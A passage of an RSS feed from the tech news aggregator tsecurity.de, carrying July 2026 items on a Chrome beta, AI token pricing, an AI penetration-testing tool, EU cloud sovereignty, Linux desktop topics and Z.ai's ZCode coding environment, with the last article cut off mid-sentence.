<li>Fixed plan/act mode notices being dropped from prompts sent to the model</li>
<li>Fixed a race where switching modes in an empty session could trigger an unexpected restart</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/cline/cline/compare/cli-v3.0.36...cli-v3.0.37"><tt>cli-v3.0.36...cli-v3.0.37</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Desktop Update]]></title>
<description><![CDATA[The Chrome team is excited to announce the promotion of Chrome 151 to the Beta channel for Windows, Mac and Linux. Chrome 151.0.7922.10 contains our usual under-the-hood performance and stability tweaks, but there are also some cool new features to explore - please head to the Chromium blog to le...]]></description>
<link>https://tsecurity.de/de/3644130/it-security-nachrichten/chrome-beta-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644130/it-security-nachrichten/chrome-beta-for-desktop-update/</guid>
<pubDate>Fri, 03 Jul 2026 19:25:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Chrome team is excited to announce the promotion of Chrome 151 to the Beta channel for Windows, Mac and Linux. Chrome 151.0.7922.10 contains our usual under-the-hood performance and stability tweaks, but there are also some cool new features to explore - please head to the <a href="https://blog.chromium.org/">Chromium blog</a> to learn more!</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.46..151.0.7922.10?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI token prices are cooling — but why?]]></title>
<description><![CDATA[A measure of daily spending on AI usage has fallen since its peak in May — although interpreting what the decline means is challenging.



The Silicon Data LLM Token Expenditure Index (SDLLMTK) is a daily snapshot of the state of the market. It draws data from a multitude of providers and produce...]]></description>
<link>https://tsecurity.de/de/3643931/ai-nachrichten/ai-token-prices-are-cooling-but-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643931/ai-nachrichten/ai-token-prices-are-cooling-but-why/</guid>
<pubDate>Fri, 03 Jul 2026 18:20:07 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A measure of daily spending on AI usage has fallen since its peak in May — although interpreting what the decline means is challenging.</p>



<p>The Silicon Data <a href="https://www.silicondata.com/products/silicon-index/llm-token-expenditure-index" target="_blank" rel="noreferrer noopener">LLM Token Expenditure Index (SDLLMTK</a>) is a daily snapshot of the state of the market. It draws data from a multitude of providers and produces a blended rate, expressed in US dollars per one million tokens. The Index currently stands at 1.62, an increase from the index’s inception in December last year, but down 20% lower than its peak in May.</p>



<p>Because the index weights frontier model and open-weight model usage differently, it’s difficult to identify the causes of the decline. Are enterprises pushing vendors to lower prices? That won’t be good news for those AI businesses going for an IPO,</p>



<p>Is there a backlash against AI as some organizations are finding the downsides? There has been some public reaction to job losses and the attack on human creativity, causing <a href="https://www.computerworld.com/article/4184559/microsoft-president-responds-to-students-distrust-for-ai.html">AI supporters to be booed at university campuses</a>. And there is also <a href="https://www.economist.com/leaders/2026/06/25/the-ai-backlash-is-only-getting-started" target="_blank" rel="noreferrer noopener">resistance to building new data centers to run AI models</a>.</p>



<p>Or are users simply switching to less token-heavy models? </p>



<p>AI vendors and their customers alike are certainly facing a dilemma. There’s the perception that AI is the future, that it can enhance productivity and ultimately save costs, but there are a host of other issues to look at as companies <a href="https://www.computerworld.com/article/4179539/the-ai-pricing-conundrum-it-started-as-a-nightmare-now-its-worse.html">attempt to justify AI spend by pointing to ROI</a> and finding it hard to calculate.</p>



<p>It’s only a snapshot, but the Silicon Data Index may be the first sign that the rush for AI may just be slowing down.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI token prices are cooling — but why?]]></title>
<description><![CDATA[A measure of daily spending on AI usage has fallen since its peak in May — although interpreting what the decline means is challenging.



The Silicon Data LLM Token Expenditure Index (SDLLMTK) is a daily snapshot of the state of the market. It draws data from a multitude of providers and produce...]]></description>
<link>https://tsecurity.de/de/3643914/it-nachrichten/ai-token-prices-are-cooling-but-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643914/it-nachrichten/ai-token-prices-are-cooling-but-why/</guid>
<pubDate>Fri, 03 Jul 2026 18:04:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A measure of daily spending on AI usage has fallen since its peak in May — although interpreting what the decline means is challenging.</p>



<p>The Silicon Data <a href="https://www.silicondata.com/products/silicon-index/llm-token-expenditure-index" target="_blank" rel="nofollow">LLM Token Expenditure Index (SDLLMTK</a>) is a daily snapshot of the state of the market. It draws data from a multitude of providers and produces a blended rate, expressed in US dollars per one million tokens. The Index currently stands at 1.62, an increase from the index’s inception in December last year, but down 20% lower than its peak in May.</p>



<p>Because the index weights frontier model and open-weight model usage differently, it’s difficult to identify the causes of the decline. Are enterprises pushing vendors to lower prices? That won’t be good news for those AI businesses going for an IPO,</p>



<p>Is there a backlash against AI as some organizations are finding the downsides? There has been some public reaction to job losses and the attack on human creativity, causing <a href="https://www.computerworld.com/article/4184559/microsoft-president-responds-to-students-distrust-for-ai.html">AI supporters to be booed at university campuses</a>. And there is also <a href="https://www.economist.com/leaders/2026/06/25/the-ai-backlash-is-only-getting-started" target="_blank" rel="nofollow">resistance to building new data centers to run AI models</a>.</p>



<p>Or are users simply switching to less token-heavy models? </p>



<p>AI vendors and their customers alike are certainly facing a dilemma. There’s the perception that AI is the future, that it can enhance productivity and ultimately save costs, but there are a host of other issues to look at as companies <a href="https://www.computerworld.com/article/4179539/the-ai-pricing-conundrum-it-started-as-a-nightmare-now-its-worse.html">attempt to justify AI spend by pointing to ROI</a> and finding it hard to calculate.</p>



<p>It’s only a snapshot, but the Silicon Data Index may be the first sign that the rush for AI may just be slowing down.</p>



<p><em>This article first appeared on InfoWorld.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nebula AI-Powered Penetration Testing Platform Automates Vulnerability Assessments]]></title>
<description><![CDATA[A new open-source security tool is bringing large language models directly into the penetration tester’s terminal. Nebula, developed by BerylliumSec, integrates state-of-the-art AI models into the command-line interface, allowing ethical hackers and security professionals to automate vulnerabilit...]]></description>
<link>https://tsecurity.de/de/3643732/it-security-nachrichten/nebula-ai-powered-penetration-testing-platform-automates-vulnerability-assessments/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643732/it-security-nachrichten/nebula-ai-powered-penetration-testing-platform-automates-vulnerability-assessments/</guid>
<pubDate>Fri, 03 Jul 2026 15:52:12 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new open-source security tool is bringing large language models directly into the penetration tester’s terminal. Nebula, developed by BerylliumSec, integrates state-of-the-art AI models into the command-line interface, allowing ethical hackers and security professionals to automate vulnerability assessments, generate exploit scripts, and maintain engagement documentation without switching contexts. Nebula supports multiple AI backends, giving users […]</p>
<p>The post <a href="https://cybersecuritynews.com/nebula-ai-penetration-testing/">Nebula AI-Powered Penetration Testing Platform Automates Vulnerability Assessments</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud sovereignty: First four providers sign up to CISPE certification program]]></title>
<description><![CDATA[The European Union’s drive towards some form of digital sovereignty has just received a boost with the first four companies ready to support the EU cloud sovereignty project.



Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the CISPE Sovereign and ...]]></description>
<link>https://tsecurity.de/de/3643542/it-security-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643542/it-security-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</guid>
<pubDate>Fri, 03 Jul 2026 14:37:26 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The European Union’s drive towards some form of <a href="https://www.cio.com/article/4038164/why-cios-need-to-respond-to-digital-sovereignty-now.html">digital sovereignty</a> has just received a boost with the first four companies ready to support the EU <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">cloud sovereignty</a> project.</p>



<p>Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the <a href="https://sovereignty.cispe.cloud/" target="_blank" rel="noreferrer noopener">CISPE Sovereign and Resilient Cloud Service Certification</a> program. Currently, they are all at the self-certification stage and have submitted their services for an independent audit to assess whether they meet the required criteria.</p>



<p>The EU has been pressing hard for a strong European presence in the cloud market. Public bodies are increasingly fearful about exposure of their data to US providers. The <a href="https://www.justice.gov/criminal/cloud-act-resources" target="_blank" rel="noreferrer noopener">US Cloud Act (Clarifying Lawful Overseas Use of Data),</a> for example, permits the US government to access a range of data held by cloud operators, even if that data is held outside the US. This <a href="https://www.networkworld.com/article/4153917/cloud-first-vs-sovereign-first-navigating-the-trade-off.html">legislation conflicts with the EU GDPR Act</a> and has prompted the call for more digital sovereignty across Europe.</p>



<p>“Public bodies, hospitals and industrial operators are today seeking concrete guarantees of digital sovereignty. The CISPE Sovereignty Badge provides that guarantee. It is a natural complement to European standards such as <a href="https://gaia-x.eu/" target="_blank" rel="noreferrer noopener">Gaia-X</a> Level 3, strengthening transparency, compliance and digital trust. It is this ability to provide concrete proof, beyond rhetoric, that underpins genuine European digital autonomy.” said Antoine Fournier, CEO of Thésée Datacenter</p>



<p>The EU is keen to guard against ‘sovereignty washing’ — claims by foreign-owned cloud providers that they meet local control criteria. Last month, <a href="https://www.cispe.cloud/four-european-operators-put-digital-sovereignty-to-the-test-etix-phocea-dc-thesee-datacenter-and-gigas-adopt-the-cispe-certification-framework/">CISPE warned about Broadcom’s claim it complied with EU conditions</a>. It probably won’t be the last to make such claims.</p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud sovereignty: First four providers sign up to CISPE certification program]]></title>
<description><![CDATA[The European Union’s drive towards some form of digital sovereignty has just received a boost with the first four companies ready to support the EU cloud sovereignty project.



Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the CISPE Sovereign and ...]]></description>
<link>https://tsecurity.de/de/3643521/it-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3643521/it-nachrichten/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program/</guid>
<pubDate>Fri, 03 Jul 2026 14:32:56 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The European Union’s drive towards some form of <a href="https://www.cio.com/article/4038164/why-cios-need-to-respond-to-digital-sovereignty-now.html">digital sovereignty</a> has just received a boost with the first four companies ready to support the EU <a href="https://www.computerworld.com/article/4109029/global-uncertainty-is-reshaping-cloud-strategies-in-europe.html">cloud sovereignty</a> project.</p>



<p>Four cloud service providers — Etix, Phocea, Thésée Datacenter, and Gigas — have signed up for the <a href="https://sovereignty.cispe.cloud/" target="_blank" rel="nofollow">CISPE Sovereign and Resilient Cloud Service Certification</a> program. Currently, they are all at the self-certification stage and have submitted their services for an independent audit to assess whether they meet the required criteria.</p>



<p>The EU has been pressing hard for a strong European presence in the cloud market. Public bodies are increasingly fearful about exposure of their data to US providers. The <a href="https://www.justice.gov/criminal/cloud-act-resources" target="_blank" rel="nofollow">US Cloud Act (Clarifying Lawful Overseas Use of Data),</a> for example, permits the US government to access a range of data held by cloud operators, even if that data is held outside the US. This <a href="https://www.networkworld.com/article/4153917/cloud-first-vs-sovereign-first-navigating-the-trade-off.html">legislation conflicts with the EU GDPR Act</a> and has prompted the call for more digital sovereignty across Europe.</p>



<p>“Public bodies, hospitals and industrial operators are today seeking concrete guarantees of digital sovereignty. The CISPE Sovereignty Badge provides that guarantee. It is a natural complement to European standards such as <a href="https://gaia-x.eu/" target="_blank" rel="nofollow">Gaia-X</a> Level 3, strengthening transparency, compliance and digital trust. It is this ability to provide concrete proof, beyond rhetoric, that underpins genuine European digital autonomy.” said Antoine Fournier, CEO of Thésée Datacenter</p>



<p>The EU is keen to guard against ‘sovereignty washing’ — claims by foreign-owned cloud providers that they meet local control criteria. Last month, <a href="https://www.cispe.cloud/four-european-operators-put-digital-sovereignty-to-the-test-etix-phocea-dc-thesee-datacenter-and-gigas-adopt-the-cispe-certification-framework/" rel="nofollow">CISPE warned about Broadcom’s claim it complied with EU conditions</a>. It probably won’t be the last to make such claims.</p>



<p><em>This article first appeared on <a href="https://www.networkworld.com/article/4192767/cloud-sovereignty-first-four-providers-sign-up-to-cispe-certification-program.html">Network World</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Bluetooth Setup and Troubleshooting: Complete Guide]]></title>
<description><![CDATA[Complete guide to Bluetooth on Linux for 2026. Learn to pair your Bluetooth headphones, mice, and keyboards using bluetoothctl or Blueman on Ubuntu, Fedora, and Arch Linux. Understand A2DP and HFP audio profiles, fix persistent connection drops, resolve firmware loading issues, and master PipeWir...]]></description>
<link>https://tsecurity.de/de/3642667/linux-tipps/linux-bluetooth-setup-and-troubleshooting-complete-guide/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642667/linux-tipps/linux-bluetooth-setup-and-troubleshooting-complete-guide/</guid>
<pubDate>Fri, 03 Jul 2026 05:54:23 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Complete guide to Bluetooth on Linux for 2026. Learn to pair your Bluetooth headphones, mice, and keyboards using bluetoothctl or Blueman on Ubuntu, Fedora, and Arch Linux. Understand A2DP and HFP audio profiles, fix persistent connection drops, resolve firmware loading issues, and master PipeWire automatic profile switching with BlueZ 5.85.]]></content:encoded>
</item>
<item>
<title><![CDATA[Finally Switched to Wayland (This is gonna be a long one)]]></title>
<description><![CDATA[I finally had enough down time a couple of weeks ago to start the process of migrating to Wayland. I figured I'd share my experience for anyone who (like me) was/is concerned about how difficult the process may be or what changes may be required for someone who uses a more "niche" setup. Context ...]]></description>
<link>https://tsecurity.de/de/3642587/linux-tipps/finally-switched-to-wayland-this-is-gonna-be-a-long-one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642587/linux-tipps/finally-switched-to-wayland-this-is-gonna-be-a-long-one/</guid>
<pubDate>Fri, 03 Jul 2026 04:08:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I finally had enough down time a couple of weeks ago to start the process of migrating to Wayland. I figured I'd share my experience for anyone who (like me) was/is concerned about how difficult the process may be or what changes may be required for someone who uses a more "niche" setup.</p> <p><strong>Context</strong><br> My primary device is a Thinkpad X280. My backup is essentially a mirrored setup on a T480s. I've been using Arch/Arch derivatives for well over a decade now, and I'm currently on Artix Linux. My main X11 workflow was DWM (heavily patched) with the typical suite of supporting apps (dmenu, rofi, st, dunst, dwmblocks, etc). My daily workflow centers heavily around the tags system with simple startup scripts depending on which apps I need for work on any given day versus when I'm just using casual email/browsing apps. Most daily apps are assigned to specific tags and I HEAVILY depend on the ability to right click a tag to show it's windows on another tag temporarily (for example, pulling over a floating browser quickly to research something then sending it back to it's home tag when I'm done). The other important aspect is my use of a 3rd gen Lenovo thunderbolt dock for swapping to a dual display setup when needed for more complex work flows.</p> <p><strong>The Switch</strong><br> I switched to MangoWM with waybar. The switch was relatively painless, as MangoWM is pretty much a prebuilt version of DWL with all the available patches most people would want, which is essentially the wayland version of DWM. I chose Mango of DWL mainly because the stagnant/slow development of DWL means it often falls behind current Wayland functionality, which is quite relevant since Wayland is VERY MUCH still a work-in-progress. The only real issues I ran into were configuring waybar and setting up tag/window rules. I eventually figured out the waybar stuff through reading docs and watching YouTube. Once figured out, it was quite simple to create a setup superior to my prior dwmblocks setup. The window rules were slightly more annoying because I learned that wayland identifies windows by their "appid" vs X11's method of using the "class". To make this more tedious, there's no true equivalent for xprop, so I had to learn how to use Mango's built-in IPC to find the appid I was looking for (grep will be very useful). Mango further complicates (or simplifies?) this by using a pseudo-fuzzy search algorithm for identifying the appid. For example, if I want to set a window rule for a PWA made through firefox, I don't have to quote the entire appid. I can just extract a unique string of characters from the appid and Mango will recognize it (pretty nifty once you get used to it).</p> <p><strong>Pros</strong><br> I'll truncate this since the post is already unreasonably long.</p> <ul> <li>Wayland is just smoother than X11/XLibre</li> <li>Built in compositing removes the need for picom/fastcompmgr</li> <li>Despite much of what I saw online before switching, resource usage is actually measurably less on my MangoWM setup vs my prior DWM setup</li> <li>Battery life actually improved for me (anywhere between 30 mins to 1.5 hours depending on usage)</li> <li>Many random X11-specific packages/config files are simply no longer necessary (xinit, xprop, XAUTHORITY, etc)</li> <li>MangoWM is just more pleasant to use with the built in transparency, blur, and simpler animations. Animations aren't a must for me, but I do have fond memories of compiz when my browser opens with a subtle zoom effect versus just popping into place</li> </ul> <p><strong>Cons</strong></p> <ul> <li>Trying to run a system without xwayland comes with MANY compromises depending on your workflow</li> <li>Many popular apps like virtualbox, steam, and bitwarden can't even launch without xwayland (which kinda feels like it defeats the purpose of moving away from X11). Zoom works, but completely messes with keyboard shortcuts, which led me to just switch to a PWA. I also swapped to a PWA for bitwarden, but didn't have simple alternatives to virtualbox and steam, so I ended up biting the bullet and installing xwayland</li> <li>Some apps simply won't work - even with xwayland (spacefm and megasync for me). I was able to get around the megasyc issue by switching to megaCMD and I begrudgingly swapped back to PCManFM with gvfs for file management</li> <li>While some "X11-specific" tools are no longer needed, their functionality simply isn't properly replicated for more advanced/niche workflows. For example, while "appid" is mostly a sufficient replacement for "Window Class" when setting up window rules, there are still some weird inconsistencies if you're used to the behavior under X11</li> </ul> <p>There's a lot more that could be said, but this post already risks being reported because of the length, so here's the TLDR. Wayland is very much usable in 2026 and is actually a better general computing experience than X11 for me. However, it does require some compromises and changes in your workflow. Despite what the vocal minority online says, much of the functionality that wayland lacks in comparison to xorg is very hyper-specific and only a small subset of users cannot replicate or find a reasonable alternative on wayland. I still see significant value in X11/XLibre maintenance depending on your use case, but as for me and my house, we will be transitioning to wayland</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/chozendude"> /u/chozendude </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1uls4cr/finally_switched_to_wayland_this_is_gonna_be_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uls4cr/finally_switched_to_wayland_this_is_gonna_be_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: Ultramarine Linux 44]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The Ultramarine Linux, a Fedora-based desktop distribution, has published a new release, version 44. The new version includes updates to three of the four desktop environments: "We have gotten tons of feedback and praise for switch...]]></description>
<link>https://tsecurity.de/de/3642472/unix-server/distribution-release-ultramarine-linux-44/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642472/unix-server/distribution-release-ultramarine-linux-44/</guid>
<pubDate>Fri, 03 Jul 2026 02:01:03 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The Ultramarine Linux, a Fedora-based desktop distribution, has published a new release, version 44. The new version includes updates to three of the four desktop environments: "We have gotten tons of feedback and praise for switching to Plasma as our recommended Edition. This release comes with Plasma 6.7,....]]></content:encoded>
</item>
<item>
<title><![CDATA[T-Mobile vs. Verizon: What to Look for if You're Switching]]></title>
<description><![CDATA[Two of the biggest US carriers are battling for your business. We run down all the specs and features of their plans.]]></description>
<link>https://tsecurity.de/de/3642272/it-nachrichten/t-mobile-vs-verizon-what-to-look-for-if-youre-switching/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3642272/it-nachrichten/t-mobile-vs-verizon-what-to-look-for-if-youre-switching/</guid>
<pubDate>Thu, 02 Jul 2026 23:17:35 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Two of the biggest US carriers are battling for your business. We run down all the specs and features of their plans.]]></content:encoded>
</item>
<item>
<title><![CDATA[Z.ai launches ZCode to challenge Cursor, Claude Code and GitHub Copilot in AI coding]]></title>
<description><![CDATA[Z.ai, the Beijing-based artificial intelligence lab formerly known as Zhipu AI, on Wednesday officially launched ZCode, a free desktop application it describes as an "Agentic Development Environment" purpose-built for its flagship GLM-5.2 large language model. The move marks the company's most ag...]]></description>
<link>https://tsecurity.de/de/3640860/it-nachrichten/zai-launches-zcode-to-challenge-cursor-claude-code-and-github-copilot-in-ai-coding/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3640860/it-nachrichten/zai-launches-zcode-to-challenge-cursor-claude-code-and-github-copilot-in-ai-coding/</guid>
<pubDate>Thu, 02 Jul 2026 13:01:57 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="http://z.ai/">Z.ai</a>, the Beijing-based artificial intelligence lab formerly known as Zhipu AI, on Wednesday officially launched <a href="https://zcode.z.ai/">ZCode</a>, a free desktop application it describes as an "Agentic Development Environment" purpose-built for its flagship <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a> large language model. The move marks the company's most aggressive push yet into the fast-growing AI-powered coding tool market, where it now competes directly with <a href="https://cursor.com/get-started">Cursor</a>, <a href="https://www.anthropic.com/product/claude-code">Claude Code</a>, <a href="https://github.com/features/copilot">GitHub Copilot</a>, and <a href="https://antigravity.google/">Google's Antigravity</a>.</p><p>"Introducing ZCode, the official development environment for GLM-5.2," the company wrote on X, noting the tool is available on macOS, Windows, and Linux, supports bring-your-own-key (BYOK) configurations for third-party models, and offers a 1.5x usage-quota bonus for subscribers to its GLM Coding Plan.</p><p>Read one way, <a href="https://zcode.z.ai/">ZCode</a> is simply another entrant in a crowded market. Read another, it is a single product that crystallizes three of the most consequential trends in enterprise software today: the race-to-the-bottom pricing of frontier AI models, the geopolitical balkanization of the AI stack, and the rapid maturation of agentic coding agents into what Gartner now estimates is a <a href="https://enterprisedna.co/resources/news/gartner-enterprise-ai-coding-agents-10-billion-market-2026/">roughly $10 billion market</a>.</p><div></div><h2><b>An AI coding tool designed to think in projects, not prompts</b></h2><p>Unlike traditional IDEs that bolt on AI through a chat sidebar or autocomplete extension, <a href="https://zcode.z.ai/">ZCode</a> is best understood as an agent-first development environment. Its core design is built around long-horizon tasks: the user describes an outcome, the agent plans the work, edits files, runs checks, reviews progress, and continues across multiple iterations until the goal is met.</p><p><a href="https://zcode.z.ai/">ZCode</a> organizes the development experience around the <a href="https://zcode.z.ai/en">ZCode Agent</a>, deeply tuned for <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>, with emphasis on deep integration: the model, tools, and execution workflow are tuned together so the Agent fits continuous, multi-step real-world development tasks. The environment supports continuous follow-up across devices: desktop, mobile Remote, and Feishu / WeChat Bot can all keep the same workspace task moving. Sensitive commands, file changes, and high-permission actions go through confirmation before execution.</p><p>That remote-control feature — the ability to steer a running coding agent from <a href="https://www.wechat.com/en">WeChat</a>, <a href="https://baike.baidu.com/en/item/Feishu/14594">Feishu</a>, or <a href="https://web.telegram.org/">Telegram</a> on a phone — is a differentiator that speaks directly to the Chinese developer market, where those messaging platforms dominate professional communication. You can keep checking progress and adding instructions while long-running work continues, from any device with these messaging apps.</p><p>The tool is free to download. Revenue flows through Z.ai's <a href="https://z.ai/subscribe">GLM Coding Plan subscription tiers</a>, which start at $16.20 per month for a "Lite" plan and scale to $144 per month for "Max" — prices that undercut Anthropic's Claude Code and Cursor's comparable tiers by significant margins.</p><p>Through July 31, <a href="https://zcode.z.ai/">ZCode</a> is offering a promotional 1.5x effective quota bonus for Coding Plan subscribers, with off-peak token consumption charged at a 0.67x coefficient. The platform also supports multiple AI models and agents, including Claude Code, Codex, Gemini, and OpenCode — a pragmatic concession to the reality that no single model wins every task.</p><h2><b>GLM-5.2, the open-source model trained entirely on Chinese chips, powers the whole experience</b></h2><p>ZCode's value proposition is inseparable from <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a>, the model it was designed to showcase. Z.ai released GLM-5.2 on June 16, first to its Coding Plan subscribers and subsequently as open-source weights under the MIT license on <a href="https://huggingface.co/zai-org/GLM-5">Hugging Face</a> — a sequencing decision that prioritized distribution over the traditional benchmark-led launch.</p><p>The model's specifications are formidable. GLM-5.2 is a 744-billion-parameter mixture-of-experts architecture with 40 billion active parameters, a genuine one-million-token context window — five times the 200K limit on its predecessor — and training on 28.5 trillion tokens. It ranked second globally on <a href="https://arena.ai/leaderboard/code/webdev">Code Arena </a>as of mid-June, trailing only Anthropic's Claude Fable 5, making it one of the highest-performing publicly available models for coding tasks.</p><p>Critically, the model was built entirely without American chips. As Decrypt reported, GLM-5.2 "<a href="https://decrypt.co/371613/china-z-ai-glm-5-2-model-rivals-claude-opus">runs entirely on Huawei silicon</a>." Stability AI founder Emad Mostaque estimated total training costs at roughly $25 million, with 80 percent spent on post-training — a figure that, if accurate, would make GLM-5.2 extraordinarily cheap relative to Western frontier models.</p><p>On benchmarks, <a href="https://z.ai/blog/glm-5.2">GLM-5.2</a> performs within striking distance of the best proprietary systems. It trails Anthropic's Claude Opus 4.8 by just one percentage point on <a href="https://www.frontierswe.com/">FrontierSWE</a>, a benchmark measuring multi-hour autonomous engineering projects, while edging out OpenAI's <a href="https://openai.com/index/introducing-gpt-5-5/">GPT-5.5</a>. </p><p>Its API pricing — $1.40 per million input tokens and $4.40 per million output — are a cost reduction of up to 82 percent compared to Anthropic's Claude Opus 4.8 at $5 and $25, respectively. Because ZCode is a first-party tool from the same company that makes the model, it requires no manual endpoint configuration — the model is wired in.</p><h2><b>The Anthropic export ban gave Chinese AI its biggest opening yet</b></h2><p>ZCode's arrival cannot be separated from the geopolitical drama that has roiled the AI industry over the past three weeks. On June 12, the U.S. government, <a href="https://www.reuters.com/technology/us-blocks-foreign-access-anthropics-most-advanced-ai-models-axios-reports-2026-06-13/">citing national security authorities</a>, issued an export control directive suspending all access to Anthropic's Fable 5 and Mythos 5 models by any foreign national, whether inside or outside the United States, including foreign national Anthropic employees. Enterprise clients in finance, healthcare, SaaS, and critical infrastructure found their core intelligence services abruptly disabled, without exception, prior warning, or effective recourse.</p><p>While the Trump administration <a href="https://www.cnbc.com/2026/06/30/anthropic-says-trump-admin-has-lifted-export-controls-on-claude-fable-5-and-mythos-5.html">lifted those controls just yesterday</a> — Anthropic confirmed on June 30 that the Department of Commerce had rescinded the directive — the episode sent shockwaves through the developer community and accelerated interest in open-source, self-hostable alternatives. The government's crackdown on Anthropic coincided with a swift rise in Chinese open-source models that are proving to be almost as capable and significantly cheaper than some of the most powerful U.S. models.</p><p>Z.ai's timing was surgical. On the same day the Trump administration ordered Anthropic's most advanced models blocked for foreign nationals, Zhipu announced the <a href="https://z.ai/blog/glm-5.2">open-source release of GLM-5.2</a> with no usage restrictions. The <a href="https://www.scmp.com/tech/article/3343239/chinas-zhipu-ai-launches-new-major-model-glm-5-challenge-its-rivals">South China Morning Post reported </a>that GLM-5.2 would be available to all users of Zhipu's new GLM Coding Plan subscription, "priced at just a tenth of Anthropic's premium Claude Code and Claude Max tiers."</p><p>The market responded accordingly. Zhipu AI's market capitalization crossed HK$1 trillion (<a href="https://www.scmp.com/tech/article/3357858/zhipu-ai-market-cap-tops-hk1-trillion-shares-glm-52-developer-soar">US$128 billion</a>) on June 22, driven by a 42 percent intraday share surge. JPMorgan raised its 2026–2030 revenue forecast for Zhipu by between 7 and 16 percent following the launch, projecting an over 534 percent revenue surge for 2026 and expecting the AI firm to turn a profit by 2028.</p><h2><b>Why vendor lock-in now carries a geopolitical risk that no SLA can cover</b></h2><p>The <a href="https://venturebeat.com/technology/anthropic-is-bringing-back-claude-fable-5-globally-after-us-lifts-export-control-order-where-can-enterprises-access-it">Fable 5 episode</a> did more than embarrass Anthropic. It introduced a new risk category into enterprise AI procurement: sovereign access risk. When a government can 